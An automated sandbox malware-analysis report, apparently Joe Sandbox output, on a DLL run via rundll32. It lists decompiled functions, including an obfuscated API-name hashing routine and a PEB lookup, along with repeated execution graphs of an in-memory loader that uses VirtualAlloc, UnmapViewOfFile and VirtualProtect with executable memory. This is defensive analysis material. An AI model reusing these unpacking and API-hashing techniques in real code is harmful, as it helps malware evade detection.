                                                                        • Instruction ID: e85a7b7b9e80fa5fa2d4e845e599cd15e0f1cf283e3ac7a04302c228e9e6df58
                                                                        • Opcode Fuzzy Hash: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
                                                                        • Instruction Fuzzy Hash: 50413471D01219EBEF08CFA1D98A9EEBBB4FB44344F20819AD011A7290E7B45B84CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
                                                                        • Instruction ID: b77e1522f9f411a300076352412bb0455ec5798372a08adffc7e0fc2ea0eca11
                                                                        • Opcode Fuzzy Hash: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
                                                                        • Instruction Fuzzy Hash: B9311372D0020DBFDF05CF95CC4A8EEBBB5FB48358F508158F91866260D3B69A659B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E1001C424(signed short* __edx, intOrPtr _a4) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				void* _t48;
                                                                        				signed int _t55;
                                                                        				signed int _t57;
                                                                        				signed int _t60;
                                                                        				signed int _t67;
                                                                        				signed int _t70;
                                                                        				signed short* _t72;
                                                                        
                                                                        				_push(_a4);
                                                                        				_t72 = __edx;
                                                                        				_push(__edx);
                                                                        				E100056B2(_t48);
                                                                        				_v8 = 0xd4f3;
                                                                        				_t60 = 0x53;
                                                                        				_v8 = _v8 / _t60;
                                                                        				_v8 = _v8 ^ 0x00000290;
                                                                        				_v4 = 0x6d95;
                                                                        				_v4 = _v4 >> 5;
                                                                        				_v4 = _v4 >> 5;
                                                                        				_v4 = _v4 ^ 0x0000001d;
                                                                        				_v4 = 0xb2ff;
                                                                        				_v4 = _v4 * 0x7b;
                                                                        				_v4 = _v4 ^ 0x00560095;
                                                                        				if( *((intOrPtr*)(__edx)) != 0) {
                                                                        					do {
                                                                        						_t57 = _v8;
                                                                        						_v4 = 0x6d95;
                                                                        						_v4 = _v4 >> 5;
                                                                        						_v4 = _v4 >> 5;
                                                                        						_v4 = _v4 ^ 0x0000001d;
                                                                        						_v4 = 0xb2ff;
                                                                        						_t67 = _v8 << _v4;
                                                                        						_v4 = _v4 * 0x7b;
                                                                        						_v4 = _v4 ^ 0x00560095;
                                                                        						_t55 =  *_t72 & 0x0000ffff;
                                                                        						_t70 = _v8 << _v4;
                                                                        						if(_t55 >= 0x41 && _t55 <= 0x5a) {
                                                                        							_t55 = _t55 + 0x20;
                                                                        						}
                                                                        						_v8 = _t55;
                                                                        						_t72 =  &(_t72[1]);
                                                                        						_v8 = _v8 + _t67;
                                                                        						_v8 = _v8 + _t70;
                                                                        						_v8 = _v8 - _t57;
                                                                        					} while ( *_t72 != 0);
                                                                        				}
                                                                        				return _v8;
                                                                        			}













                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
                                                                        • Instruction ID: 5b25bb63792a61215608fa0d211dbb58c93cd0ca643869af53e15713821623f5
                                                                        • Opcode Fuzzy Hash: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
                                                                        • Instruction Fuzzy Hash: B521D0B25093469BD314CF22E55941BBBE5FBC47A4F11C82EF0949A250D3B9D9888FA3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
                                                                        • Instruction ID: 5e4aedc5437bb4b730e64eae390bb59a5c3d05a595a5c90b558fa43b463ff24e
                                                                        • Opcode Fuzzy Hash: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
                                                                        • Instruction Fuzzy Hash: 19212475D01209EBEF14DFE5C94A8DFBFB5EF44314F108189E514A6290D7B55A50CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
                                                                        • Instruction ID: 20914b439a1a855b43ffabf6c900b342f87e07b14d6fa3fc41aad407bb02958c
                                                                        • Opcode Fuzzy Hash: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
                                                                        • Instruction Fuzzy Hash: 34218E71E00208FBEB08DFE5D94A9DEBBB6FB44310F10C099E514AB280D7B65B548F81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10001D4D() {
                                                                        
                                                                        				return  *[fs:0x30];
                                                                        			}



                                                                        0x10001d53

                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1e08d0 1073 1e08ed 1072->1073 1078 1dff50 1073->1078 1075 1e097c 1081 1e0530 VirtualAlloc 1075->1081 1077 1e09b3 1079 1dff91 1078->1079 1080 1dffc4 VirtualAlloc 1079->1080 1080->1075 1082 1e058e 1081->1082 1083 1e0615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 1e0650 1083->1084 1085 1e077d 1084->1085 1086 1e0752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 1e0070 1088 1dff50 VirtualAlloc 1087->1088 1089 1e007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001E0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001E0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001E063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001E0770
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2124194003.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 7c315b2937cfc09b47359cd463c81ddf2159125a5a7695dbdfeaeb785a5cd8ca
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 32B198B4E00109DFCB48CF85C591AAEB7B5BF88304F248159E919AB345D775EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 1dff50-1dff9b call 1e0360 42 1dff9d-1dffa7 call 1e0360 39->42 43 1dffaa-1dffda call 1dfd30 VirtualAlloc 39->43 42->43
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DFFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2124194003.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 7aa1de5240b737123d0b2ed92ef97064d34e08d3b664a1fd37bbf04b53327661
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 7B113060D082C9DEEB01D7E898097EFBFB55B21704F044098D6456A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1064 2408d0 1065 2408ed 1064->1065 1070 23ff50 1065->1070 1067 24097c 1073 240530 VirtualAlloc 1067->1073 1069 2409b3 1071 23ff91 1070->1071 1072 23ffc4 VirtualAlloc 1071->1072 1072->1067 1074 24058e 1073->1074 1075 240615 UnmapViewOfFile VirtualAlloc 1074->1075 1076 240650 1075->1076 1077 24077d 1076->1077 1078 240752 VirtualProtect 1076->1078 1077->1069 1078->1076 1079 240070 1080 23ff50 VirtualAlloc 1079->1080 1081 24007d 1080->1081

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00240575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00240625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0024063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00240770
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2134000123.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_220000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 23ff50-23ff9b call 240360 42 23ffaa-23ffda call 23fd30 VirtualAlloc 39->42 43 23ff9d-23ffa7 call 240360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0023FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2134000123.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_220000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 2108d0 1073 2108ed 1072->1073 1078 20ff50 1073->1078 1075 21097c 1081 210530 VirtualAlloc 1075->1081 1077 2109b3 1079 20ff91 1078->1079 1080 20ffc4 VirtualAlloc 1079->1080 1080->1075 1082 21058e 1081->1082 1083 210615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 210650 1083->1084 1085 21077d 1084->1085 1086 210752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 210070 1088 20ff50 VirtualAlloc 1087->1088 1089 21007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00210575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00210625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0021063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00210770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2147803114.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 20ff50-20ff9b call 210360 42 20ffaa-20ffda call 20fd30 VirtualAlloc 39->42 43 20ff9d-20ffa7 call 210360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.2147803114.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1064 2308d0 1065 2308ed 1064->1065 1070 22ff50 1065->1070 1067 23097c 1073 230530 VirtualAlloc 1067->1073 1069 2309b3 1071 22ff91 1070->1071 1072 22ffc4 VirtualAlloc 1071->1072 1072->1067 1075 23058e 1073->1075 1074 230615 UnmapViewOfFile VirtualAlloc 1076 230650 1074->1076 1075->1074 1077 23077d 1076->1077 1078 230752 VirtualProtect 1076->1078 1077->1069 1078->1076 1079 230070 1080 22ff50 VirtualAlloc 1079->1080 1081 23007d 1080->1081

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00230575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00230625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0023063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00230770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2157350672.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_210000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 22ff50-22ff9b call 230360 42 22ffaa-22ffda call 22fd30 VirtualAlloc 39->42 43 22ff9d-22ffa7 call 230360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0022FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2157350672.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_210000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1d08d0 1073 1d08ed 1072->1073 1078 1cff50 1073->1078 1075 1d097c 1081 1d0530 VirtualAlloc 1075->1081 1077 1d09b3 1079 1cff91 1078->1079 1080 1cffc4 VirtualAlloc 1079->1080 1080->1075 1082 1d058e 1081->1082 1083 1d0615 UnmapViewOfFile VirtualAlloc 1082->1083 1085 1d0650 1083->1085 1084 1d077d 1084->1077 1085->1084 1086 1d0752 VirtualProtect 1085->1086 1086->1085 1087 1d0070 1088 1cff50 VirtualAlloc 1087->1088 1089 1d007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001D0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001D0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001D063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001D0770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2168410050.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 1cff50-1cff9b call 1d0360 42 1cff9d-1cffa7 call 1d0360 39->42 43 1cffaa-1cffda call 1cfd30 VirtualAlloc 39->43 42->43
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2168410050.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1908d0 1073 1908ed 1072->1073 1078 18ff50 1073->1078 1075 19097c 1081 190530 VirtualAlloc 1075->1081 1077 1909b3 1079 18ff91 1078->1079 1080 18ffc4 VirtualAlloc 1079->1080 1080->1075 1082 19058e 1081->1082 1083 190615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 190650 1083->1084 1085 19077d 1084->1085 1086 190752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 190070 1088 18ff50 VirtualAlloc 1087->1088 1089 19007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00190625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2177317496.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 18ff50-18ff9b call 190360 42 18ffaa-18ffda call 18fd30 VirtualAlloc 39->42 43 18ff9d-18ffa7 call 190360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2177317496.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1d08d0 1073 1d08ed 1072->1073 1078 1cff50 1073->1078 1075 1d097c 1081 1d0530 VirtualAlloc 1075->1081 1077 1d09b3 1079 1cff91 1078->1079 1080 1cffc4 VirtualAlloc 1079->1080 1080->1075 1082 1d058e 1081->1082 1083 1d0615 UnmapViewOfFile VirtualAlloc 1082->1083 1085 1d0650 1083->1085 1084 1d077d 1084->1077 1085->1084 1086 1d0752 VirtualProtect 1085->1086 1086->1085 1087 1d0070 1088 1cff50 VirtualAlloc 1087->1088 1089 1d007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001D0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001D0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001D063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001D0770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2188145807.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 1cff50-1cff9b call 1d0360 42 1cff9d-1cffa7 call 1d0360 39->42 43 1cffaa-1cffda call 1cfd30 VirtualAlloc 39->43 42->43
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2188145807.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 900042fdf7f883baeb07b9f29496fca8e7a44ea98bbf02942e3e0086ac75ab76
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: A1113360D08289EEEB01D7E88409BEFBFB55B21704F044098D6456A282D3BA5759C7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1908d0 1073 1908ed 1072->1073 1078 18ff50 1073->1078 1075 19097c 1081 190530 VirtualAlloc 1075->1081 1077 1909b3 1079 18ff91 1078->1079 1080 18ffc4 VirtualAlloc 1079->1080 1080->1075 1082 19058e 1081->1082 1083 190615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 190650 1083->1084 1085 19077d 1084->1085 1086 190752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 190070 1088 18ff50 VirtualAlloc 1087->1088 1089 19007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00190625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2197891087.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 18ff50-18ff9b call 190360 42 18ffaa-18ffda call 18fd30 VirtualAlloc 39->42 43 18ff9d-18ffa7 call 190360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2197891087.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
